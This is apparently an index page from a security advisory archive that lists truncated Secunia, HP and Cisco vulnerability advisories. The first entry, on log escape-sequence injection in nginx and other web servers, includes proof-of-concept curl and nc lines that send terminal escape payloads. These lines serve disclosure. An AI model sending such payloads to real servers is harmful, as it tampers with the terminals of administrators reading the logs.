New User, Welcome!     Login

Next Page >>

verify

Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver, Yaws and Boa log escape sequence injection

   (Affected versions: 0.94.14rc21 and probably earlier versions)

A) "nginx" log escape sequence injection

One of the following two Proofs Of Concept can be used in order to
verify the vulnerability.

curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a

echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload

Secunia Research: AproxEngine Multiple Vulnerabilities

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* AproxEngine 5.3.04

[security bulletin] HPSBMA02491 SSRT100060 rev.1 - HP Operations Manager for Windows, Remote Execution of Arbitrary Code

Note: The appropriate new version, either srcvw4.dll or srcvw32.dll, must be installed on the Operations Manager for Windows management server and on all remote console systems.

For Operations Manager for Windows v8.10 and v8.16

Verify the version of srcvw4.dll currently installed

Right-click on %OvInstallDir%\bin\srcvw4.dll
Select Properties
Switch to details tab
Check File version

Secunia Research: OpenX Multiple Vulnerabilities

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* OpenX 2.6.3

Secunia Research: Quicksilver Forums Cross-Site Request Forgery Vulnerability

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* Quicksilver Forums 1.4.2

Secunia Research: Pulse CMS Cross-Site Request Forgery

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* Pulse CMS basic version 1.2.2 and 1.2.3

Secunia Research: HP SiteScope SNMP Trap Script Insertion Vulnerability

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* HP SiteScope 9.0 build 911.

Secunia Research: Trend Micro OfficeScan "cgiRecvFile.exe" Buffer Overflow

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* Trend Micro OfficeScan 7.3 patch 4 build 1362

Cisco Security Advisory: Multiple Vulnerabilities in Cisco Unified IP Phones 7900 Series

These vulnerabilities are documented in Cisco bug IDs CSCtf07426 
and CSCtn65815 and have been assigned Common Vulnerabilities and 
Exposures (CVE) identifiers CVE-2011-1602 and CVE-2011-1603 
respectively.

Signature Verification Bypass Vulnerability
+------------------------------------------
Cisco Unified IP Phones 7900 Series devices are affected by a
signature verification bypass vulnerability that could allow an
authenticated attacker to load a software image without verification
of its signature.

[security bulletin] HPSBUX02335 SSRT071454 rev.1 - HP-UX Running useradd(1M), Local Unauthorized Access

 * The /etc/default/useradd template file is missing 
 * The HOMEDIR or GROUPID field is missing from the /etc/default/useradd template file 

MANUAL ACTIONS: Yes 
All user accounts should be verified for proper GROUPID and correct HOMEDIR entries. 

PRODUCT SPECIFIC INFORMATION 

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa

[security bulletin] HPSBUX02335 SSRT071454 rev.2 - HP-UX Running useradd(1M), Local Unauthorized Access

* The /etc/default/useradd template file is missing 
* The HOMEDIR or GROUPID field is missing from the /etc/default/useradd template file 

MANUAL ACTIONS: Yes 
All user accounts should be verified for proper GROUPID and correct HOMEDIR entries. 

PRODUCT SPECIFIC INFORMATION 

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa

[security bulletin] HPSBUX02366 SSRT080120 rev.2 - HPUX Running useradd(1M), Local Unauthorized Access

The corrupt /etc/default/useradd template file can cause accounts to be created with incorrect ownership and permissions. 
The patches insure that useradd(1M) options are processed correctly in all cases. 

MANUAL ACTIONS: Yes - NonUpdate 

Verify group id and home directory for all accounts 

PRODUCT SPECIFIC INFORMATION 

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa

[security bulletin] HPSBUX02366 SSRT080120 rev.1 - HPUX Running useradd(1M), Local Unauthorized Access

* The /etc/default/useradd template file is missing 
* The HOMEDIR or GROUPID field is missing from the /etc/default/useradd template file 

MANUAL ACTIONS: Yes - NonUpdate 

Verify group id and home directory for all accounts 

PRODUCT SPECIFIC INFORMATION 

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa

Secunia Research: Orbit Downloader metalink "name" Directory Traversal

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* Orbit Downloader 3.0.0.4 and 3.0.0.5

Secunia Research: Pulse CMS Arbitrary File Upload Vulnerability

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* Pulse CMS basic version 1.2.2 and 1.2.3

Secunia Research: XnView DICOM Parsing Integer Overflow Vulnerability

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* XnView 1.97

Secunia Research: TaskFreak "tznMessage" Cross-Site Scripting Vulnerability

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* TaskFreak 0.6.3

Secunia Research: Quicksilver Forums "mysqldump" Password Disclosure

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* Quicksilver Forums 1.4.2

Secunia Research: DevIL DICOM "GetUID()" Buffer Overflow Vulnerability

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* DevIL 1.7.8

Secunia Research: Sun Java JDK/JRE Soundbank Resource Parsing Buffer Overflow

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* Sun Java JDK/JRE 1.6 Update 17

Secunia Research: aria2 metalink "name" Directory Traversal Vulnerability

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* aria2 1.9.1 build2

Secunia Research: Novell iPrint Client Date/Time Parsing Buffer Overflow

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* Novell iPrint Client 4.38

Secunia Research: Winamp Impulse Tracker Sample Parsing Buffer Overflow

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* Winamp 5.56 Media Player

Secunia Research: Winamp Impulse Tracker Instrument Parsing Buffer Overflows

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* Winamp 5.56 Media Player

Secunia Research: Joomla BookLibrary From Same Author Module "id" SQL Injection

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* BookLibrary From Same Author 1.5

Secunia Research: Mozilla Firefox Memory Corruption Vulnerability

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* Mozilla Firefox 3.0.15 and 3.5.4.

Secunia Research: e107 Avatar/Photograph Image File Upload Vulnerability

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* e107 version 0.7.19

Secunia Research: HP Power Manager "formExportDataLogs" Buffer Overflow

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* HP Power Manager version 4.2.9.

Secunia Research: TomatoCMS Script Insertion Vulnerabilities

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* TomatoCMS version 2.0.4.

Secunia Research: Adobe Shockwave Player 3D Model Two Integer Overflows

Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

====================================================================== 
1) Affected Software 

* Adobe Shockwave Player 11.5.2.602
Next Page>>

Copyright © 1995-2012 LinuxRocket.net. All rights reserved.

Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!